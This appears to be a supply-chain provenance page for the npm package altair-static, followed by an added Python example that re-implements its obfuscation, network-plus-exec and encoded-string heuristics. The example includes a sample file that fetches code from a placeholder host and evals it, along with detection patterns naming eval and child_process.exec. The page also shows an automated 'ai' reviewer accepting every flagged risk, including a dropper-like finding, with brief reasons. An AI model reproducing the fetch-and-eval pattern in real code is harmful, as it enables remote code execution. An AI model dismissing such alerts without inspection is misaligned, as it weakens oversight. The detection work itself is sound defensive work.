altair-static
Supply chain provenance
Status for the latest visible version.
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:build/dist/worker-2ZPX3FTR.js | AI (source-diff): Standard bundled worker output with Sentry debug IDs; expected for this package. | ai | |
| source-diff | obfuscated-file:build/dist/iframe-sandbox/assets/index-DN1P4DX8.js | AI (source-diff): Standard Vite-bundled minified output for a GraphQL client UI; not malicious obfuscation. | ai | |
| source-diff | obfuscated-file:build/dist/iframe-sandbox/assets/index-DL_PXIxX.js | AI (source-diff): Minified Vite build artifact for iframe sandbox; expected in this package. | ai | |
| source-diff | obfuscated-file:build/dist/worker-JHIJ5B6A.js | AI (source-diff): Minified web worker bundle; consistent with Altair's GraphQL client architecture. | ai | |
| publish-pattern | rapid-publish | AI (publish-pattern): Automated CI/CD monorepo releases; rapid successive publishes are expected. | ai | |
| source-diff | encoded-string-file:build/dist/main.js | AI (source-diff): Long strings in minified Angular/GraphQL client bundle; no malicious payload pattern. | ai | |
| source-diff | net-exec-file:build/dist/chunk-7THP26YK.js | AI (source-diff): Standard Vite-bundled frontend chunk with Sentry instrumentation; not a dropper. | ai | |
| email-domain | unclaimed-email:sirmuel.design | AI (email-domain): Long-established package with SLSA provenance; domain lapse is a latent risk but no active hijack evidence. | ai | |
Versions (showing 6 of 6)
| Version | Deps | Published |
|---|---|---|
| 8.5.7 | 1 / 9 | |
| 8.5.6 | 1 / 9 | |
| 8.5.5 | 1 / 9 | |
| 8.5.4 | 1 / 9 | |
| 8.5.3 | 1 / 9 | |
| 8.5.2 | 1 / 9 | |
v8.5.7
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.6
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.5
1 finding
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.4
1 finding
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.3
5 findings
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Modified file contains 2 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
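The three source-diff heuristics behind the findings above (long lines in a newly added file, network call plus dynamic code execution in a newly added file, long encoded string literals in a modified file) are simple enough to reproduce, which is useful when deciding whether an accepted-risk entry for a build artifact is justified. The block below is an added example written for this page, not the scanner's code: the thresholds (3000 chars, 200+ chars) and the rule names (`obfuscated-file`, `net-exec-file`, `encoded-string-file`) are taken from the page, while the regex token patterns, the `added`/`modified` status model and the sample files are assumptions constructed for the demonstration.

```python
"""Toy re-implementation of the source-diff heuristics named on this page.

Added example, not the scanner's own code. Thresholds and rule names come
from the findings text; the token patterns and sample inputs are assumptions.
"""
import base64
import re
from dataclasses import dataclass

LONG_LINE_CHARS = 3000        # page: "lines over 3000 chars"
ENCODED_STRING_CHARS = 200    # page: "long encoded string(s) (200+ chars)"

# Assumed indicator patterns. A production scanner would walk the JS AST;
# regexes are enough to show how the rules combine.
NET_CALL_RE = re.compile(r"\b(fetch|XMLHttpRequest|WebSocket|https?\.request)\s*\(")
DYN_EXEC_RE = re.compile(r"\b(eval|Function|vm\.runInThisContext|child_process\.exec)\s*\(")
# A quoted literal that is one long run of base64 (optional padding) or hex.
ENCODED_RE = re.compile(
    r"""["']((?:[A-Za-z0-9+/]{%d,}={0,2})|(?:[0-9a-fA-F]{%d,}))["']"""
    % (ENCODED_STRING_CHARS, ENCODED_STRING_CHARS)
)


@dataclass(frozen=True)
class Finding:
    rule: str    # same rule names as the accepted-risks table
    path: str
    detail: str


def scan_file(path: str, text: str, status: str) -> list[Finding]:
    """status is 'added' or 'modified', as a source-diff scanner knows it.

    The page treats a NEW file as the strong indicator for obfuscation and
    net+exec, so those two rules are gated on status == 'added'.
    """
    out: list[Finding] = []
    longest = max((len(line) for line in text.splitlines()), default=0)
    if status == "added" and longest > LONG_LINE_CHARS:
        out.append(Finding("obfuscated-file", path, f"longest line {longest} chars"))
    if status == "added" and NET_CALL_RE.search(text) and DYN_EXEC_RE.search(text):
        out.append(Finding("net-exec-file", path,
                           "network call and dynamic code execution in one new file"))
    encoded = ENCODED_RE.findall(text)
    if encoded:
        out.append(Finding("encoded-string-file", path,
                           f"{len(encoded)} encoded string(s) of {ENCODED_STRING_CHARS}+ chars"))
    return out


def scan_diff(files: dict[str, tuple[str, str]]) -> list[Finding]:
    """files maps path -> (status, content); returns findings in path order."""
    findings: list[Finding] = []
    for path, (status, text) in sorted(files.items()):
        findings.extend(scan_file(path, text, status))
    return findings


def rules_by_path(findings: list[Finding]) -> dict[str, list[str]]:
    """Group rule names per file, the shape a reviewer triages from."""
    grouped: dict[str, list[str]] = {}
    for f in findings:
        grouped.setdefault(f.path, []).append(f.rule)
    return grouped


# Constructed sample "diff" (not real altair-static content). File names are
# invented; only their shape mirrors the artifacts listed on the page.
MINIFIED_LINE = ";".join(f"var v{i}={i}" for i in range(400))   # ~5000 chars, one line
B64_BLOB = base64.b64encode(b"A" * 225).decode()                # 300 base64 chars
SAMPLE_DIFF: dict[str, tuple[str, str]] = {
    "build/dist/worker-example.js": ("added", MINIFIED_LINE + "\n"),
    "build/dist/chunk-example.js": (
        "added",
        '(async()=>{const r=await fetch("https://example.invalid/s2");'
        "eval(await r.text());})();\n",
    ),
    "build/dist/main.js": ("modified", f'const k="{B64_BLOB}";\nexport default k;\n'),
    "src/index.ts": ("modified", "export function add(a: number, b: number) { return a + b; }\n"),
}

if __name__ == "__main__":
    for path, rules in rules_by_path(scan_diff(SAMPLE_DIFF)).items():
        print(path, "->", ", ".join(rules))
```

Note what the sample shows: the minified worker and the base64 blob trip exactly the rules the accepted-risks table waves through for bundler output, while the `net-exec-file` rule fires on a two-line file that both fetches and `eval`s, which is the one pattern on this page that a reviewer should not accept on the strength of "it is minified Vite output" alone; the file has to be read. The provenance finding is a separate check: for an installed copy, the npm CLI's `npm audit signatures` verifies registry signatures and provenance attestations, which is the practical way to confirm the Sigstore signal the page reports.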